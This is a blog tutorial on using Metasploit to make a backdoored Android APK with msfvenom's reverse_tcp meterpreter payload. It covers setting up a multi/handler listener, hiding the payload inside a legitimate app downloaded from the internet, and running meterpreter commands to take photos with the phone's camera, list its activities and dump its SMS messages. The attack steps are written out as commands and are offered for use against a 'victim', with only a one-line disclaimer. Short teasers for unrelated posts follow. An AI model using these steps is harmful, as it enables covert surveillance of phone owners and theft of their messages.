Skip to main content

[Android + msf]How to use Metasploit Framework on an Android Device?

Metasploit Framework(msf)

  • Linux-based OS
  • You'll need to have msfconsole installed on your machine
    You'll need to have msfvenom correctly installed on the machine. This will be used to generate the backdoor.
  •  Install apktool as well.
Note: This tutorial is meant for educational purposes only. Please don't misguide the purpose of this tutorial, you'll be responsible for any act of Hacking or theft.


1) First of all open up your terminal. (Ctrl + Alt + T)
$ sudo apt-get update
Update your repositories before starting.

2) Once updated, we can start. Simply follow the steps below to get started:
$ sudo msfvenom -p android/meterpreter/reverse_tcp LHOST='' LPORT='xxxx' R > testfile.apk
Replace "testfile" with any name you want. This will be the Main Activity, which when tapped on your android device will activate meterpreter on your terminal and let you gain full access to the victims android phone.

  • You can check out the architecture list for msfvenom here!
Set LHOST to the ip address of your machine and LPORT to any port number which is not being used by your network, for e.g 4444.
$ ifconfig
ifconfig will give you the IP address you need to start the exploit.

3) Once you've set LHOST and LPORT, Press Enter and wait till the Main activity is created.

4) After it's created, simply move the apk file to your phone and Install it.

5) Open ./msfconsole on your terminal.
$ sudo ./msfconsole
6) Once the console is up, turn it to the exploit mode by generating the following command:
msf > use multi/handler
msf exploit(handler) > set PAYLOAD android/meterpreter/reverse_tcp
msf exploit(handler) > set LHOST ''
msf exploit(handler) > set LPORT 'xxxx'

7) Almost done!
Run exploit and tap on the Main Activity you just installed on your android phone. This will give you access to the android phone from the terminal.
msf exploit(handler) > exploit
8) The meterpreter must be up and running by now. Run the help command to see the arguments you can use.
meterpreter > webcam_snap -i 2
You can also generate the backdoor in an existing app.
Simply download the app from the internet, and use the '-x' to specify the name of the app you just dowloaded.

After msfvenom re created the app, install it into your android phone and the remaining steps remains the same.

  • webcam_scap
    This will take a picture from the camera you specified, of course, if the android phone has front and back camera. The camera is specified in the form of index (-i).
    1: Front Camera
    2: Back Camera
  •  ps
    Will list all running activities on the phone. 
  •  dump_sms
    Will save all the messages sent and received on the android phone, to an external .txt file.

If you're having trouble, please leave it in the comments section below.

Popular posts from this blog

How to install the FReMP Stack on Ubuntu 20.04?

Technology keeps on evolving everyday and developers constantly look for more and more things to get their hands-on. In this article, I will be introducing a new full stack framework, called FReMP . The abbreviation used is not the best one, but it just gets the work done in justifiable ways. What on earth is FReMP stack? The FReMP stack is a highly scalable full stack framework, which can be used to build awesome web apps. The acronym stands for F lask, Re actJS, M ongodb and P ython. Unlike other famous stacks such as MEAN and MERN, the FReMP stack uses Python to handle back-end operations. Examples of such operations can be machine learning and artificial intelligence operations, web scraping tools or digital image processing. Step 0: Update your list of installed packages While this is optional, it is always a good practice to update your list of packages and upgrade them for newer versions before starting any installation on your environment. Run the following to do so: $ apt-get

Learn how to make an auto login bot with Autoit

Start by creating a new directory and make an autoit script. Edit the script and include IE.au3: #include    Suppose we're writing a script which will allow a anyone to sign in his facebook on a scheduled time automatically. It's simple, don't panic! You need to call a function with any name you want. Let's take loginfb() ! call ("loginfb") So, we only have to write the function loginfb now! Func loginfb() Global $oIE = _IECreate ("") Local $username = _IEGetObjByName ($oIE, "email") Local $password = _IEgetObjByName ($oIE, "pass") Local $button = _IEGetObjById ($oIE, "loginbutton") _IEFormElementSetValue ($username, "") // your email here! _IEFormElementSetValue ($password, "") //your fb password here! Send("{Enter}") EndFunc $username and $password are variables. "email" and "pass" are the names given to the textarea

[Python]Publish your python project to PyPI

The Python Package Index, also known as PyPI, is a large repository of python packages. Millions of developers all around the world contribute to Python daily by creating python scripts and uploading to PyPI. In this blog post, I am going to write a simple python script that, on running, will print Hello World on the terminal. Then, going to upload this script to PyPI so that it can be installed on any platform easily using pip or pip3 . Requirements: 1. Github account 2. Basic knowledge of python 3. setuptools - (pip3 install setuptools) 4. wheel - (pip3 install wheel) By the end of this blog post, you should be able to print hello world using a single command: Let's get started! The first thing to do is find a unique name for your project. The name that I will call the Hello World script will be print_hello_world . At the time that I am writing this post, there is not package called print_hello_world  on  PyPI . Logically, after doing this tutorial, there might